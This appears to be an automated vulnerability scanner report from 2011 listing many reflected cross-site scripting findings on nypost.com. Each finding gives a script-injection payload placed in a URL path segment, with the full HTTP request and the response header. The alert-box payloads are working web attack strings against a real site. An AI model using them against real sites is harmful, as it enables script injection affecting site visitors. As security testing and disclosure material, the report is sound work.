HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 710 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:36 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 15ba4<script>alert(1)</script>76213674490 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks15ba4<script>alert(1)</script>76213674490/markets/markets.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 711 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:41 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b2052<script>alert(1)</script>324e5de0974 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/marketsb2052<script>alert(1)</script>324e5de0974/markets.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 711 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:45 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c3ca5<script>alert(1)</script>159526d3663 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/markets/markets.jsc3ca5<script>alert(1)</script>159526d3663 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 711 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:47 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload abe04<script>alert(1)</script>34ac36cff1c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfigabe04<script>alert(1)</script>34ac36cff1c/WebPortal/nypost/blocks/masthead/last_updated.htm HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ X-Requested-With: XMLHttpRequest Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; __utmc=1; __utmb=1.1.10.1297130884; UnicaID=6rmqDxCzDKL-Wz2U94r; ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 718 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:18 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 40e1c<script>alert(1)</script>69d7103355d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal40e1c<script>alert(1)</script>69d7103355d/nypost/blocks/masthead/last_updated.htm HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ X-Requested-With: XMLHttpRequest Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; __utmc=1; __utmb=1.1.10.1297130884; UnicaID=6rmqDxCzDKL-Wz2U94r; ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 718 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:21 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b3350<script>alert(1)</script>acc34c7bdea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypostb3350<script>alert(1)</script>acc34c7bdea/blocks/masthead/last_updated.htm HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ X-Requested-With: XMLHttpRequest Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; __utmc=1; __utmb=1.1.10.1297130884; UnicaID=6rmqDxCzDKL-Wz2U94r; ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 718 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:35 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c2bab<script>alert(1)</script>071c8535c3a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocksc2bab<script>alert(1)</script>071c8535c3a/masthead/last_updated.htm HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ X-Requested-With: XMLHttpRequest Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; __utmc=1; __utmb=1.1.10.1297130884; UnicaID=6rmqDxCzDKL-Wz2U94r; ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 718 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:37 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 53749<script>alert(1)</script>fc5c8eb1611 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/masthead53749<script>alert(1)</script>fc5c8eb1611/last_updated.htm HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ X-Requested-With: XMLHttpRequest Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; __utmc=1; __utmb=1.1.10.1297130884; UnicaID=6rmqDxCzDKL-Wz2U94r; ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 718 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:39 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload b5752<script>alert(1)</script>9d2d05dbc3 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/masthead/last_updated.htmb5752<script>alert(1)</script>9d2d05dbc3 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ X-Requested-With: XMLHttpRequest Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=1.1297130884.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1991144109.1297130884.1297130884.1297130884.1; __utmc=1; __utmb=1.1.10.1297130884; UnicaID=6rmqDxCzDKL-Wz2U94r; ym_pop_freq_expiration1584519=Wed, 09 Feb 2011 02:08:14 GMT; ym_pop_freq1584519=1
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 717 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:41 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 71c33<script>alert(1)</script>9a2c668fa7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig71c33<script>alert(1)</script>9a2c668fa7/WebPortal/nypost/blocks/masthead/masthead.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 712 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:12 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4dd2c<script>alert(1)</script>c01aff57693 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal4dd2c<script>alert(1)</script>c01aff57693/nypost/blocks/masthead/masthead.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:14 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload eb416<script>alert(1)</script>8688fb62039 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nyposteb416<script>alert(1)</script>8688fb62039/blocks/masthead/masthead.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:15 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 932f8<script>alert(1)</script>87e8580f29e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks932f8<script>alert(1)</script>87e8580f29e/masthead/masthead.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:17 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 27b0c<script>alert(1)</script>7b782001792 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/masthead27b0c<script>alert(1)</script>7b782001792/masthead.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:19 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload fadb9<script>alert(1)</script>22e27319abf was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/masthead/masthead.jsfadb9<script>alert(1)</script>22e27319abf HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:22 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7423d<script>alert(1)</script>126b9e6e9b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig7423d<script>alert(1)</script>126b9e6e9b0/WebPortal/nypost/blocks/most_popular/most_popular_functions.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 731 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:22 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6f8a0<script>alert(1)</script>b945617608 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal6f8a0<script>alert(1)</script>b945617608/nypost/blocks/most_popular/most_popular_functions.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 730 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:24 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 45957<script>alert(1)</script>418b31416ee was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost45957<script>alert(1)</script>418b31416ee/blocks/most_popular/most_popular_functions.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 731 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:26 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ffad8<script>alert(1)</script>a8feeea4c7a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocksffad8<script>alert(1)</script>a8feeea4c7a/most_popular/most_popular_functions.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 731 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:29 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 330e6<script>alert(1)</script>51f07698fa was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/most_popular330e6<script>alert(1)</script>51f07698fa/most_popular_functions.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 730 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:31 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 3c1eb<script>alert(1)</script>dda135f85c3 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js3c1eb<script>alert(1)</script>dda135f85c3 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 731 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:33 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2ffad<script>alert(1)</script>46814ff2e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig2ffad<script>alert(1)</script>46814ff2e7/WebPortal/nypost/blocks/polls/poll_functions.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 715 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:38 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 34cc2<script>alert(1)</script>8d75df63245 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal34cc2<script>alert(1)</script>8d75df63245/nypost/blocks/polls/poll_functions.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 716 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:40 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ee309<script>alert(1)</script>6d68ee05997 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypostee309<script>alert(1)</script>6d68ee05997/blocks/polls/poll_functions.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 716 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:41 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 3823a<script>alert(1)</script>0b8de5eb651 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks3823a<script>alert(1)</script>0b8de5eb651/polls/poll_functions.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 716 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:43 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 777d0<script>alert(1)</script>15709d8a432 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/polls777d0<script>alert(1)</script>15709d8a432/poll_functions.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 716 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:45 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 727e8<script>alert(1)</script>4709bb85bf7 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/polls/poll_functions.js727e8<script>alert(1)</script>4709bb85bf7 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 716 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:47 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8bac9<script>alert(1)</script>42516a33a4b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig8bac9<script>alert(1)</script>42516a33a4b/WebPortal/nypost/blocks/search/search.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 709 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:16 GMT Connection: close
